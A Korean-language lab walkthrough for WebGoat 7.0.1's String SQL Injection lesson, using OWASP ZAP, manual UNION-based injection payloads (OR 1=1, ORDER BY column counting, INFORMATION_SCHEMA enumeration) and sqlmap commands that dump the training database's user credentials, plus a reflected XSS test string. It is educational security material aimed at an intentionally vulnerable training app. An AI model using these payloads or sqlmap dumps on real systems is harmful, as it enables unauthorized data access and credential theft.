홈페이지 취약점 분석 이야기 파일 지도 사진 깨알

>> 목록보이기
#OWASP WebGoat #웹해킹 실습 #실습설명서 #SQL구문삽입 #SQL Injection #SQL인젝션 #sqlmap #hsqldb #수동 SQL구문삽입 #Manual SQL Injection #In-band SQLi #Union-based SQLi #information_schema #A1-Injection

WebGoat 문자열 SQL구문삽입 (String SQL Injection) 실습설명서

이 문서는 WebGoat 7.0.1의 "Injection Flaws" > "String SQL Injection"의 실습 설명서이다. 웹브라우저가 전달하는 사용자의 입력값을 서버가 검증하지 않고 SQL해석기(SQL Parser)에 전달할 때 발생할 수 있는 문제점을 배울 수 있다.

WH-WebGoat-7.0.1 웹해킹 훈련장을 구동한다. 구동에 관해서는 WH-WebGoat-7.0.1 라이브 ISO 문서를 참조한다. 여기서 WebGoat 훈련장의 IP주소는 192.168.189.238이다.

WebGoat 실행이 완료되면 파이어폭스(FireFox) 웹브라우저로 훈련장에 접속한다. 훈련장 URL은 http://192.168.189.238:8080/WebGoat/이다. 그리고 OWASP ZAP을 실행한다. 

firefox http://192.168.189.238:8080/WebGoat/
owasp-zap 2&> /dev/null

Firefox의 Preferences > Adanaced > Network > Settings...에서 HTTP 프록시를 OWASP-ZAP의 프록시 포트인 127.0.0.1:8080에 연결한다.

Injection Flaws: String SQL Injection - OWASP-ZAP 스캔

Firefox 웹 브라우저로 WebGoat의 String SQL Injection 실습문제에 접속해보자.

WebGoat String SQL Injection: 홈페이지
[ WebGoat: String SQL Injeciton, 첫 화면 ]

WebGoat: String SQL Injection은 이름(성)을 입력하여 개인정보를 열람하는 웹 애플리케이션이다. "Go!"를 눌러서 OWASP-ZAP에서 어떤 HTTP 통신이 이루어지는 지 확인해 보자.

WebGoat String SQL Injection: OWASP-ZAP
[ WebGoat: String SQL Injeciton, OWASP-ZAP의 이력(History) 화면 ]

DB에서 정보를 열람하는 HTTP 요청은 다음과 같다. 

http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=Your+Name&SUBMIT=Go!

OWASP ZAP의 이력(Hitory) 탭에서 위의 URL을 선택하고 오른쪽 마우스 단추를 눌러서 "공격" -> "Active Scan"을 실행하면 단일 URL에 대해서 웹취약점 스캔을 시작한다..

OWASP ZAP의 웹취약점 스캔(Active Scan) 결과는 다음과 같다.

  • [위험도 상] Cross-site Scripting (Reflected)
    URL: http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=%27%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT=Go%21 (account_name 변수)
  • [위험도 상] SQL Injection - Hypersonic SQL
    URL: http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=%27&SUBMIT=Go%21 (account_name 변수)
  • [위험도 중] X-Frame-Options Header Not Set
    X-Frame-Optons HTTP 헤더 설명 참조
  • [위험도 하] Password Autocomplete in Browser
    <input> 엘리먼트에서 autocomplete="off" 미설정
  • [위험도 하] Web Browser XSS Protectiton Not Enabled
    X-XSS-Protection HTTP 헤더 설명 참조
  • [위험도 하] X-Content-Type-Options Header Missing
    X-Content-Type-Options HTTP 헤더 설명 참조

위험도 상인 XSS 취약점과 SQL Injection 항목을 살펴보자.

[반사형 XSS, Cross-site Scripting (Reflected)]

WebGoat String SQL Injection: OWASP-ZAP ActiveScan, XSS
[ WebGoat: String SQL Injeciton, OWASP-ZAP의 Active Scan 결과 - XSS]

OWASP-ZAP이 반사형 XSS로 팀자한 URL은 http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=%27%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT=Go%21이고 URL 변수는 accout_name이다. 화면을 살펴보면, account_name에 입력한 HTML('><script>alert(1);</script>)이 서버의 응답에 그대로 반사되어 출력되는 것을 볼 수 있다. 이 입력의 결과로 <input> 항목이 닫히고 <script>라는 HTML 엘리먼트가 삽입된다. 실제 이 URL을 Firefox로 접근하면 alert(1) 경고창이 뜬다.

[SQL 구문삽입, SQL Injection - Hypersoic SQL]

WebGoat String SQL Injection: OWASP-ZAP ActiveScan, Hypersonic SQL Injection
[ WebGoat: String SQL Injeciton, OWASP-ZAP의 Active Scan 결과 - SQL구문삽입 ]

OWASP-ZAP이 http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=%27&SUBMIT=Go%21 URL의 응답에서 SQL 구문삽입을 탐지하였다. SQL삽입의 단서를 제공하는 서버의 응답은 Unexpected end of command in statement [SELECT * FROM user_data WHERE last_name = ']이다. 이번에도 account_name 변수에서 탐지되었다.

Firefox에서 SQL구문삽입의 확인

입력: Your Name'

SELECT * FROM user_data WHERE last_name = 'Your Name''

Unexpected end of command in statement [SELECT * FROM user_data WHERE last_name = ']

작은따옴표(')를 덧붙여서 SQL 문법 오류를 유도하였다. 위의 서버응답으로부터 SQL문법이 틀린 것을 확인할 수 있다. OR 연산자를 삽입하여 공격자가 조작한 문법이 실행되는 지 확인한다.

입력: Your Name' OR 1=1 --

WebGoat String SQL Injection: OR 구문 삽입
[ WebGoat: String SQL Injeciton, OR를 이용한 SQL구문삽입 사례 ]

Firefox에서 "Enter your last name: "에 Your Name' OR 1=1 -- 를 입력한 결과 화면이다. OR 연산자 삽입으로 특정 테이블(여기서는 user_data)의 내용이 모두 출력되는 것을 볼 수 있다. SQL 구문삽입이 확인되었다!!!

WebGoat: String SQL Injection 웹 애플리케이션은 조건에 맞는 모든 항목을 출력하는 인터페이스를 제공한다. 하지만 대다수의 경우에는 1개의 항목만을 출력하는 경우가 많다. 이러한 경우에는 LIMIT 연산자를 이용하여 하나씩 출력하여 데이타를 유출할 수 있다. Your Name' OR 1=1 LIMIT 0,1 -- , Your Name' OR 1=1 LIMIT 1,1 -- , Your Name' OR 1=1 LIMIT 2,1 -- , Your Name' OR 1=1 LIMIT 3,1 -- , Your Name' OR 1=1 LIMIT 4,1 -- 등과 같은 방식이다.

sqlmap을 이용한 SQL구문삽입 점검

SQL인젝션 진단은 위와 같이 하는 것으로 완료된다. 하지만 추가 점검을 위해서 관리자나 일반회원 계정정보가 필요할 수 있다. SQL구문삽입은 시간이 많이 소요되는 작업이므로 웹취약점 점검에서는 SQL 전문 공격도구를 사용하면 점검시간을 대폭 단축할 수 있다. 

sqlmap --cookie "JSESSIONID=C8248ABD080623DF6BC1E1B5C3D1C6B9" -u "http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=Your+Name&SUBMIT=Go!" -p account_name
[18:24:50] [INFO] GET parameter 'account_name' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable

sqlmap --cookie "JSESSIONID=C8248ABD080623DF6BC1E1B5C3D1C6B9" -u "http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=Your+Name&SUBMIT=Go!" -p account_name --dbs
available databases [2]:                                                                                 
[*] INFORMATION_SCHEMA
[*] PUBLIC

sqlmap --cookie "JSESSIONID=C8248ABD080623DF6BC1E1B5C3D1C6B9" -u "http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=Your+Name&SUBMIT=Go!" -p account_name -D PUBLIC --tables 
Database: PUBLIC                                                                                         
[16 tables]
+---------------------+
| AUTH                |
| EMPLOYEE            |
| MESSAGES            |
| MFE_IMAGES          |
| OWNERSHIP           |
| PINS                |
| PRODUCT_SYSTEM_DATA |
| ROLES               |
| SALARIES            |
| TAN                 |
| TRANSACTIONS        |
| USER_DATA           |
| USER_DATA_TAN       |
| USER_LOGIN          |
| USER_SYSTEM_DATA    |
| WEATHER_DATA        |
+---------------------+

sqlmap --cookie "JSESSIONID=C8248ABD080623DF6BC1E1B5C3D1C6B9" -u "http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=Your+Name&SUBMIT=Go!" -p account_name -D PUBLIC -T USER_SYSTEM_DATA --columns
Database: PUBLIC                                                                                         
Table: USER_SYSTEM_DATA
[4 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| COOKIE    | VARCHAR |
| PASSWORD  | VARCHAR |
| USER_NAME | VARCHAR |
| USERID    | VARCHAR |
+-----------+---------+

sqlmap --cookie "JSESSIONID=C8248ABD080623DF6BC1E1B5C3D1C6B9" -u "http://192.168.189.238:8080/WebGoat/attack?Screen=281&menu=1100&account_name=Your+Name&SUBMIT=Go!" -p account_name -D PUBLIC -T USER_SYSTEM_DATA --dump
Database: PUBLIC
Table: USER_SYSTEM_DATA
[5 entries]
+--------+---------+----------+-----------+
| USERID | COOKIE  | PASSWORD | USER_NAME |
+--------+---------+----------+-----------+
| 105    | <blank> | dave     | dave      |
| 104    | <blank> | jeff     | jeff      |
| 103    | <blank> | passwd3  | jplane    |
| 102    | <blank> | passwd2  | jdoe      |
| 101    | <blank> | passwd1  | jsnow     |
+--------+---------+----------+-----------+

위와 같이 sqlmap을 이용하면 빠르게 데이터베이스 유출을 증빙할 수 있다. 추가 점검에 필요한 정보도 열람하여 보다 심도있는 점검을 진행할 수 있다.

SQL구문삽입을 수동으로 따라해 보기

SQL 구문삽입 취약점(SQL Injection, SQLi)이 있을 때 공격자가 데이터베이스를 열람할 수 있는 방법은 직접유출(In-band SQLi), 간접유출(Blind SQLi), 우회유출(Out-of-band SQLi) 방식이 있다 (참고자료: Types of SQL Injection? - Acunetix). WebGoat: String SQL Injection 문제에서는 UNION 문을 사용하는 전통적인 직접유출 SQL 구문삽입 취약점이 존재한다. UNION 주입을 통해 데이터베이스를 유출해봄으로써 SQL 구문삽입을 이해해보자.

UNION 문의 특징은 UNION 앞과 뒤의 구문이 가져오는 컬럼의 수가 동일해야 한다는 점이다. 

SELECT name,id,pw FROM user_data WHERE account='john' UNION SELECT id,year,amount FROM salary_data account='john'

위의 SQL문은 john 계정의 회원정보(user_data 테이블의 3개 컬럼)와 전체 연봉 데이터(salary_data 테이블의 3개 컬럼)를 동시에 조회할 수 있다. UNION으로 두 개의 SELECT문을 연결함으로써 각 SELECT 문의 결과를 하나의 결과로 묶은 것이다. UNION에서는 앞과 뒤의 결과가 서로 컬럼 갯수만 같으면 된다. UION기반 SQL삽입에서는 바로 이 컬럼 수를 알아내는 것이 정보유출의 핵심이 된다. 그 방법으로는 ORDER BYSELECT 1,2,3,...,n FROM 정보스키마.테이블의 두가지가 있다. WebGoat: String SQL Injection에서 이 두 가지 방법을 살펴보자.

[ORDER BY를 이용한 컬럼 수 알아내기]

입력: Your Name' ORDER BY 1 -- 
출력: "No results matched. Try Again." (정상 메시지)

SELECT의 첫번째 컬럼으로 정렬할 수 있다. 즉 1개 이상의 컬럼을 가져온다.

숫자를 증가시키면서 이 작업을 반복한다. 

입력: Your Name' ORDER BY 7 -- 
출력: "No results matched. Try Again." (정상 메시지)

SELECT의 일곱번째 컬럼으로 정렬할 수 있다. 즉 7개 이상의 컬럼을 가져온다. 

입력: Your Name' ORDER BY 8 -- 
출력: "Cannot be in ORDER BY clause in statement [SELECT * FROM user_data WHERE last_name = 'Your Name' ORDER BY 8 ]" (오류 메시지)

SELECT의 여덟번째 컬럼으로 정렬할 수 없다. 즉 SELECT 문은 7개의 컬럼을 가져온다.

[SELECT 1,2,3,...n FROM 정보스키마.테이블를 이용한 컬럼 수 알아내기]

주요 DBMS 별 정보스키마(information_schema) 뷰의 테이블, 컬럼 정보 테이블은 다음과 같다.

DBMS정보스키마 테이블 이름
HSQLDB INFORMATION_SCHEMA.SYSTEM_TABLES, INFORMATION_SCHEMA.SYSTEM_COLUMNS
MS SQL 서버 INFORMATION_SCHEMA.TABLES, INFORMATION_SCHEMA.COLUMNS
MySQL INFORMATION_SCHEMA.TABLES, INFORMATION_SCHEMA.COLUMNS
Oracle INFORMATION_SCHEMA.TABLES, INFORMATION_SCHEMA.COLUMNS

HSQLDB 2.x에서는 다른 주요 DBMS와 마찬가지로 INFORMATION_SCHEMA.TABLES, INFORMATION_SCHEMA.COLUMNS를 지원한다. WebGoat 훈련장의 HSQLDB는 1.x 버전이다. 

입력: Your Name' UNION SELECT 1,2,3 FROM INFORMATION_SCHEMA.SYSTEM_TABLES -- 
출력: "Column count does not match in statement [SELECT * FROM user_data WHERE last_name = 'Your Name' UNION SELECT 1,2,3 FROM INFORMATION_SCHEMA.SYSTEM_TABLES]" (오류: 컬럼수 불일치)

SELECT 문의 컬럼 수가 다르다. 즉 SELECT 문의 컬럼수는 3개가 아니다.

위의 과정을 1, 1,2, 1,2,3, 1,2,3,4, 1,2,3,4,5 와 같이 계속 증가시키면서 반복한다. 

입력: Your Name' UNION SELECT 1,2,3,4,5,6 FROM INFORMATION_SCHEMA.SYSTEM_TABLES -- 
출력: "Column count does not match in statement [SELECT * FROM user_data WHERE last_name = 'Your Name' UNION SELECT 1,2,3,4,5,6 FROM INFORMATION_SCHEMA.SYSTEM_TABLES]" (오류: 컬럼수 불일치)

SELECT 문의 컬럼 수가 다르다. 즉 SELECT 문의 컬럼수는 6개가 아니다. 

입력: Your Name' UNION SELECT 1,2,3,4,5,6,7 FROM INFORMATION_SCHEMA.SYSTEM_TABLES -- 
출력: (테이블 출력)



USERIDFIRST_NAMELAST_NAMECC_NUMBERCC_TYPECOOKIELOGIN_COUNT


1234567

정상적인 질의에서 동일한 양식의 표가 출력되었다. 즉 SELECT 문의 컬럼수는 7개이다. 

입력: Your Name' UNION SELECT 1,TABLE_SCHEM,TABLE_NAME,4,5,6,7 FROM INFORMATION_SCHEMA.SYSTEM_TABLES -- 
출력: (테이블 출력)





USERIDFIRST_NAMELAST_NAMECC_NUMBERCC_TYPECOOKIELOGIN_COUNT
1INFORMATION_SCHEMASYSTEM_ALIASES4567
1INFORMATION_SCHEMASYSTEM_ALLTYPEINFO4567
1INFORMATION_SCHEMASYSTEM_AUTHORIZATION4567
1INFORMATION_SCHEMASYSTEM_BESTROWIDENTI4567
1INFORMATION_SCHEMASYSTEM_CACHEINFO4567
1INFORMATION_SCHEMASYSTEM_CATALOGS4567
1INFORMATION_SCHEMASYSTEM_CHECK_COLUMN_4567
1INFORMATION_SCHEMASYSTEM_CHECK_CONSTRA4567
1INFORMATION_SCHEMASYSTEM_CHECK_ROUTINE4567
1INFORMATION_SCHEMASYSTEM_CHECK_TABLE_U4567
1INFORMATION_SCHEMASYSTEM_CLASSPRIVILEG4567
1INFORMATION_SCHEMASYSTEM_COLLATIONS4567
1INFORMATION_SCHEMASYSTEM_COLUMNPRIVILE4567
1INFORMATION_SCHEMASYSTEM_COLUMNS4567
1INFORMATION_SCHEMASYSTEM_CROSSREFERENC4567
1INFORMATION_SCHEMASYSTEM_INDEXINFO4567
1INFORMATION_SCHEMASYSTEM_PRIMARYKEYS4567
1INFORMATION_SCHEMASYSTEM_PROCEDURECOLU4567
1INFORMATION_SCHEMASYSTEM_PROCEDURES4567
1INFORMATION_SCHEMASYSTEM_PROPERTIES4567
1INFORMATION_SCHEMASYSTEM_ROLE_AUTHORIZ4567
1INFORMATION_SCHEMASYSTEM_SCHEMAS4567
1INFORMATION_SCHEMASYSTEM_SCHEMATA4567
1INFORMATION_SCHEMASYSTEM_SEQUENCES4567
1INFORMATION_SCHEMASYSTEM_SESSIONINFO4567
1INFORMATION_SCHEMASYSTEM_SESSIONS4567
1INFORMATION_SCHEMASYSTEM_SUPERTABLES4567
1INFORMATION_SCHEMASYSTEM_SUPERTYPES4567
1INFORMATION_SCHEMASYSTEM_TABLEPRIVILEG4567
1INFORMATION_SCHEMASYSTEM_TABLES4567
1INFORMATION_SCHEMASYSTEM_TABLETYPES4567
1INFORMATION_SCHEMASYSTEM_TABLE_CONSTRA4567
1INFORMATION_SCHEMASYSTEM_TEXTTABLES4567
1INFORMATION_SCHEMASYSTEM_TRIGGERCOLUMN4567
1INFORMATION_SCHEMASYSTEM_TRIGGERS4567
1INFORMATION_SCHEMASYSTEM_TYPEINFO4567
1INFORMATION_SCHEMASYSTEM_UDTATTRIBUTES4567
1INFORMATION_SCHEMASYSTEM_UDTS4567
1INFORMATION_SCHEMASYSTEM_USAGE_PRIVILE4567
1INFORMATION_SCHEMASYSTEM_USERS4567
1INFORMATION_SCHEMASYSTEM_VERSIONCOLUMN4567
1INFORMATION_SCHEMASYSTEM_VIEWS4567
1INFORMATION_SCHEMASYSTEM_VIEW_COLUMN_U4567
1INFORMATION_SCHEMASYSTEM_VIEW_ROUTINE_4567
1INFORMATION_SCHEMASYSTEM_VIEW_TABLE_US4567
1PUBLICAUTH4567
1PUBLICEMPLOYEE4567
1PUBLICMESSAGES4567
1PUBLICMFE_IMAGES4567
1PUBLICOWNERSHIP4567
1PUBLICPINS4567
1PUBLICPRODUCT_SYSTEM_DATA4567
1PUBLICROLES4567
1PUBLICSALARIES4567
1PUBLICTAN4567
1PUBLICTRANSACTIONS4567
1PUBLICUSER_DATA4567
1PUBLICUSER_DATA_TAN4567
1PUBLICUSER_LOGIN4567
1PUBLICUSER_SYSTEM_DATA4567
1PUBLICWEATHER_DATA4567

SQL구문삽입에 의해 INFORMATION_SCHEMA.SYSTEM_TABLES 테이블의 일부 컬럼을 열람할 수 있다. 출력이 문자열인 컬럼에 TABLE_SCHEMTABLE_NAME을 출력하였다 - WebGoat: String SQL Injection 실습에서는 Java 프로그래밍에서 숫자형에 문자열 출력을 방지하고 있다.

이 결과로부터 WebGoat: String SQL Injection 웹 애플리케이션이 접근할 수 있는 DB는 INFORMATION_SCHEMAPUBLIC 두 개임을 알 수 있다. 또한 PUBLIC 데이터베이스는 AUTH, EMPLOYEE, MESSAGES, MFE_IMAGES, OWNERSHIP, PINS, PRODUCT_SYSTEM_DATA, ROLES, SALARIES, TAN, TRANSACTIONS, USER_DATA, USER_DATA_TAN, USER_LOGIN, USER_SYSTEM_DATA, WEATHER_DATA 등의 테이블로 구성되어 있는 것을 파악할 수 있다.

이제 Restart Lesson를 누르자. 그리고 다음 입력을 WebGoat: String SQL Injection 페이지에서 입력한다. 

입력: Your Name' UNION SELECT 1,TABLE_NAME,COLUMN_NAME,4,TYPE_NAME,6,7 FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE TABLE_SCHEM='PUBLIC'-- 
출력: (테이블 출력)



USERIDFIRST_NAMELAST_NAMECC_NUMBERCC_TYPECOOKIELOGIN_COUNT
1AUTHFUNCTIONID4VARCHAR67
1AUTHROLE4VARCHAR67
1EMPLOYEEADDRESS14VARCHAR67
1EMPLOYEEADDRESS24VARCHAR67
1EMPLOYEECCN4VARCHAR67
1EMPLOYEECCN_LIMIT4INTEGER67
1EMPLOYEEDISCIPLINED_DATE4CHAR67
1EMPLOYEEDISCIPLINED_NOTES4VARCHAR67
1EMPLOYEEEMAIL4VARCHAR67
1EMPLOYEEFIRST_NAME4VARCHAR67
1EMPLOYEELAST_NAME4VARCHAR67
1EMPLOYEEMANAGER4INTEGER67
1EMPLOYEEPASSWORD4VARCHAR67
1EMPLOYEEPERSONAL_DESCRIPTION4VARCHAR67
1EMPLOYEEPHONE4VARCHAR67
1EMPLOYEESALARY4INTEGER67
1EMPLOYEESSN4VARCHAR67
1EMPLOYEESTART_DATE4CHAR67
1EMPLOYEETITLE4VARCHAR67
1EMPLOYEEUSERID4INTEGER67
1MESSAGESLESSON_TYPE4VARCHAR67
1MESSAGESMESSAGE4VARCHAR67
1MESSAGESNUM4INTEGER67
1MESSAGESTITLE4VARCHAR67
1MESSAGESUSER_NAME4VARCHAR67
1MFE_IMAGESIMAGE_RELATIVE_URL4VARCHAR67
1MFE_IMAGESUSER_NAME4VARCHAR67
1OWNERSHIPEMPLOYEE_ID4INTEGER67
1OWNERSHIPEMPLOYER_ID4INTEGER67
1PINSCC_NUMBER4VARCHAR67
1PINSNAME4VARCHAR67
1PINSPIN4INTEGER67
1PRODUCT_SYSTEM_DATAPRICE4VARCHAR67
1PRODUCT_SYSTEM_DATAPRODUCTID4VARCHAR67
1PRODUCT_SYSTEM_DATAPRODUCT_NAME4VARCHAR67
1ROLESROLE4VARCHAR67
1ROLESUSERID4INTEGER67
1SALARIESSALARY4INTEGER67
1SALARIESUSERID4VARCHAR67
1TANTANNR4INTEGER67
1TANTANVALUE4INTEGER67
1TANUSERID4INTEGER67
1TRANSACTIONSAMOUNT4INTEGER67
1TRANSACTIONSDESCRIPTION4VARCHAR67
1TRANSACTIONSFROM_ACCOUNT4VARCHAR67
1TRANSACTIONSSEQUENCE4INTEGER67
1TRANSACTIONSTO_ACCOUNT4VARCHAR67
1TRANSACTIONSTRANSACTIONDATE4TIMESTAMP67
1TRANSACTIONSUSERNAME4VARCHAR67
1USER_DATACC_NUMBER4VARCHAR67
1USER_DATACC_TYPE4VARCHAR67
1USER_DATACOOKIE4VARCHAR67
1USER_DATAFIRST_NAME4VARCHAR67
1USER_DATALAST_NAME4VARCHAR67
1USER_DATALOGIN_COUNT4INTEGER67
1USER_DATAUSERID4INTEGER67
1USER_DATA_TANCC_NUMBER4VARCHAR67
1USER_DATA_TANCC_TYPE4VARCHAR67
1USER_DATA_TANCOOKIE4VARCHAR67
1USER_DATA_TANFIRST_NAME4VARCHAR67
1USER_DATA_TANLAST_NAME4VARCHAR67
1USER_DATA_TANLOGIN_COUNT4INTEGER67
1USER_DATA_TANPASSWORD4VARCHAR67
1USER_DATA_TANUSERID4INTEGER67
1USER_LOGINUSERID4VARCHAR67
1USER_LOGINWEBGOAT_USER4VARCHAR67
1USER_SYSTEM_DATACOOKIE4VARCHAR67
1USER_SYSTEM_DATAPASSWORD4VARCHAR67
1USER_SYSTEM_DATAUSERID4VARCHAR67
1USER_SYSTEM_DATAUSER_NAME4VARCHAR67
1WEATHER_DATAMAX_TEMP4INTEGER67
1WEATHER_DATAMIN_TEMP4INTEGER67
1WEATHER_DATANAME4VARCHAR67
1WEATHER_DATASTATE4CHAR67
1WEATHER_DATASTATION4INTEGER67

PUBLIC 데이터베이스에 포함된 모든 테이블의 컬럼 정보를 출력하였다. 그 중 USER_SYSTEM_DATA 테이블이 COOKIE (VARCHAR), PASSWORD (VARCHAR), USERID (VARCHAR), USER_NAME (VARCHAR)의 네 개 컬럼으로 구성된 것을 볼 수 있다. 이 테이블의 내용을 열람(dump)해 보자.

이제 Restart Lesson를 누른다. 그리고 다음 입력을 WebGoat: String SQL Injection 페이지에서 입력한다. 

입력: Your Name' UNION SELECT 1,COOKIE,PASSWORD,4,USERID,USER_NAME,7 FROM PUBLIC.USER_SYSTEM_DATA -- 
출력: (테이블 출력)



USERIDFIRST_NAMELAST_NAMECC_NUMBERCC_TYPECOOKIELOGIN_COUNT
1dave4105dave7
1jeff4104jeff7
1passwd14101jsnow7
1passwd24102jdoe7
1passwd34103jplane7

아직 어디에서 사용하는 지는 알 수 없지만 dave:dave, jeff:jeff, jsnow:passwd1, jdoe:passwd2, jplane:passwd3 등의 계정정보를 확보하였다. 이와 같은 방식으로 각 테이블의 내용도 모두 덤프할 수 있게 된다.

sqlmap은 이러한 과정을 자동화한 SQL 공격도구이다. 웹취약점분석 작업은 대부분의 경우에 있어서 시간의 제약이 있기때문에 수작업보다는 sqlmap을 이용하여 취약점을 점검하는 것이 시간을 절약할 수 있는 좋은 방법이다.

[처음 작성한 날: 2016.12.17]    [마지막으로 고친 날: 2016.12.18] 

< 이전 글 : WebGoat: Numeric SQL Injection (2016.12.16)

> 다음 글 : WebGoat: Blind Numeric SQL Injection (추리기반 SQL 구문삽입의 이해) (2016.12.18)

크리에이티브 커먼즈 라이선스 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문